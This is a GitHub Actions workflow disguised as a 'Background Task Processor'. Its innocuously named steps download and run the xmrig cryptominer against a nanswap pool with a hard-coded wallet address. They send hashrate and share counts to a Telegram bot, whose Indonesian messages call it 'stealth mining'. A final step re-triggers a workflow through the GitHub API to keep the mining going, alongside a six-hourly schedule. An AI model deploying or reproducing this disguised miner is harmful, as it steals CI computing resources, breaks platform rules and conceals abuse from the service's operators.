name: Background Task Processor

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"

jobs:
  task:
    runs-on: ubuntu-latest

    steps:
      - name: Set up job
        run: echo "Initializing task..."

      - name: Prepare Environment
        run: sudo apt update -y && sudo apt install curl tar jq -y

      - name: Notify Start to Telegram
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
          -d chat_id=$TG_CHAT_ID \
          -d text="🟢 *Stealth mining dimulai.*\n\nWorker sedang dijalankan melalui GitHub Actions." \
          -d parse_mode=Markdown

      - name: Download & Run Stealth Worker
        run: |
          curl -L -o runner.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
          tar -xzf runner.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig
          ./xmrig -o xmrig.nanswap.com:3333 -a rx -k -u nano_1ep4soo6rat31n6otw4ggqdwj7tz5sjymyzfwi7kmhye6f31guujdo19cc3q -p x --log-file=log.txt --randomx-1gb-pages --donate-level=1 &
          PID=$!
          sleep 300
          kill $PID

      - name: Send Mining Stats to Telegram
        if: always()
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          LOGFILE="./xmrig-6.24.0/log.txt"
          if [ -f "$LOGFILE" ]; then
            HASHRATE=$(grep -m1 "speed" "$LOGFILE" | awk -F'speed' '{print $2}' | awk '{print $1 " H/s"}')
            RESULT=$(grep -i "accepted" "$LOGFILE" | wc -l)
            MSG="📊 *Statistik Mining*\n\n• Hashrate: \`$HASHRATE\`\n• Share Diterima: \`$RESULT\`"
          else
            MSG="⚠️ Statistik log tidak ditemukan. Kemungkinan worker gagal atau dibatalkan."
          fi

          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
            -d chat_id=$TG_CHAT_ID \
            -d text="$MSG" \
            -d parse_mode=Markdown

      - name: Notify Done to Telegram
        if: always()
        env:
          TG_TOKEN: ${{ secrets.TG_TOKEN }}
          TG_CHAT_ID: ${{ secrets.TG_CHAT_ID }}
        run: |
          curl -s -X POST https://api.telegram.org/bot$TG_TOKEN/sendMessage \
          -d chat_id=$TG_CHAT_ID \
          -d text="🔴 *Stealth mining selesai atau dihentikan.*\n\nGitHub Actions selesai menjalankan worker." \
          -d parse_mode=Markdown

      - name: Re-trigger Task
        if: always()
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl -X POST -H "Accept: application/vnd.github+json" \
               -H "Authorization: Bearer $GH_TOKEN" \
               https://api.github.com/repos/${{ github.repository }}/actions/workflows/build.yml/dispatches \
               -d '{"ref":"main"}'
